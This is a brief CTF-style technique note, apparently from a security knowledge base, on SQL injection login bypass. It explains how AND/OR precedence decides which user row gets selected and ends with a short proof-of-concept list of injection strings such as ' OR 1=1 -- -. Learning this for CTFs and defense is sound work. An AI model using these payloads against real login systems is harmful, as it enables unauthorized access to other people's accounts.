pwneglyph logo

Note

web http sql-injection authentication-bypass operator-precedence

Bias row selection in injectable login queries by reasoning about AND/OR precedence instead of blindly appending OR 1=1.

SQLi where AND / OR Precedence Matters

SQL injection is not just "append OR 1=1". Operator precedence determines which row or branch the query actually selects.

Why It Works

  • username='...' AND password='...' with a careless OR 1=1 authenticates as an arbitrary low-ID user, not your target — precedence and row order decide who you become.

Vulnerable Pattern

  • Login queries combining multiple conditions without explicit parentheses.

Exploit Flow

  1. Reason about the original query shape before choosing a payload.
  2. Test authentication with controlled injections in each field separately, then both together.
  3. If you land on the wrong user, adapt the payload to bias row selection toward the target account.

Variations

  • UNION, boolean conditions, comment placement, and row-order influence.

Common Blockers

  • The query returns the first matching row, so careless OR 1=1 logs you in as an arbitrary user.

PoC Sketch

username=admin' -- -
username=admin' OR 1=1 -- -
password=' OR 1=1 -- -

Good Situations To Use It

  • An injectable multi-condition login query.
  • You need a specific account, not any account.
  • You can inject into more than one field.

Sources

  • midnight_flag2026/web/blackbank
  • 0xFUN2026/web/tony_toolkit